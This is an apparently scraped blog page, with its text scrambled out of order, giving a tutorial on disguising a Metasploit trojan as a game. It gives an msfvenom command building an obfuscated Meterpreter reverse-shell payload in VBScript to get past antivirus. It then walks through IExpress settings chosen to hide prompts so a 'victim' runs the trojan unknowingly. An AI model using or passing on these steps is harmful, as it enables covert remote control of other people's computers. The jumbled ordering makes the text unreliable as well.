naxcine.blogg.se - Iexpress post install commands

Choose " Don't save." (Next) This will prevent IExpress from saving a save file of the executable it will generate.Enter the name & destination folder and check both boxes.

Select " No message." (Next) This will prevent a screen from popping up once the victim closes the legitimate executable saying "Installation complete!" or anything of the like.

In the " Post installation command," click on your legitimate executable. If it's an executable, just select your executable.

In the " Install program" box, type " cscript trojan.vbs" or whatever your trojan is called.

IMPORTANT: The executable you choose must be a stand-alone, unless you manually add all of its components (.dll, etc.). In this case I'll just use a game I made for the legitimate executable.

Add your trojan and legitimate executable.(Next) This will keep a license screen from appearing (remember, we don't want this to look like an installer, just a regular game). Choose " No prompt." (Next) This will run the executable without confirmation.Enter your package title (something related to your legitimate executable).Choose " Extract files and run installation command." (Next).Open IExpress as an administrator (this is very important!) and select " Create new Self Extracting Derivative file" and hit " Next." So please don't call out "That's not your game!" Step 3: Using IExpress (On Windows) NOTE: When I compile the trojan with the game later, just note that I'm not using the one in this screenshot. Use a USB stick or some other way to transfer the trojan to a Windows computer. LHOST=yourIP LPORT=443 > /root/Desktop/trojan.vbs: This tells is what IP and port to use (make sure you put in your own IP address!) It then saves it to the Desktop.

-e x86/shikata_ga_nai -i 62 -f vbs: Encoder to use, amount of times to encode, and output format.msfvenom -p windows/meterpreter/reverse_tcp: This tells Metasploit what payload to use.Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f vbs LHOST= LPORT= > root/Desktop/trojan.vbs (You can call it whatever you want.) )įor this tutorial, I'll be encoding it with MSFvenom. I find this to be detected by AV much less than an executable. You can generate any Windows payload you want, but I would recommend encoding it in VBScript format. This tutorial is meant to disguise trojans for Windows. It is likely that they will delete this "broken file" once they see that it "doesn't work." In order to prevent this, we need to disguise the trojan. This is a sign for me to immediately check my Task Manager, but for an unsuspecting victim, it will just seem like a broken file. So, we all probably know that when you run a trojan made by Metasploit, nothing will appear to happen.